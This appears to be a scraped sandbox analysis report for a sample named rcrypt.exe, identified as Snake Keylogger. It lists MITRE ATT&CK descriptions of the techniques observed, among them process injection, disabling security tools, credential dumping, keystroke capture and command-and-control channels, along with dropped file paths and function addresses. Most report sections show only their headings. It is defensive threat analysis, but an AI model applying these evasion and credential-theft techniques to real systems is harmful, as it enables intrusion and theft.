Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rcrypt.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Montevideo

C:\Users\user\AppData\Local\Temp\aut63AD.tmp

C:\Users\user\AppData\Local\Temp\aut640C.tmp

C:\Users\user\AppData\Local\Temp\holloing

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
rcrypt.exe

Function 000F3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 000F4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 000F4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 001593DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 000F3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72
windowregistryCOMMON

Function 000F3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 000F71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 000F3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 000F3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 000F3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 016F25D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 000F39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 016F23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140
fileCOMMON

Function 0011564D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Function 000F69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre